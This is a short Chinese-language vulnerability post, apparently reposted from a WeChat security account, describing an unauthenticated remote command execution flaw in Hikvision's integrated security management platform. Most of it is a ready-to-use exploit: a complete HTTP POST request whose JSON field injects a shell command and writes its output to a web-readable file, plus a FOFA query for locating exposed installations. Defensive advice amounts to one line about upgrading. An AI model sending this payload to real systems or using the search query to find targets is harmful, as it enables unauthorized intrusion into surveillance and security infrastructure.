影响范围
综合安防管理平台
漏洞概述
综合安防管理平台detection存在前台远程命令执行漏洞
漏洞复现
应用界面如下所示:
漏洞POC如下所示:
POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1Host: x.x.x.xCache-Control: max-age=0Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestIf-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://61.153.75.118/portal/cas/login/loginPage.do?service=http://61.153.75.118:80/portalAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu=Connection: closeContent-Length: 135{"type":"environment","operate":"","machines":{"id":"$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}
查看执行结果:
/vms/static/1.txt目标检索
FOFA:
app="HIKVISION-综合安防管理平台"
安全建议
升级到最新版本~
原文始发于微信公众号(七芒星实验室):【护网漏洞】海康威视综合安防管理平台前台远程命令执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论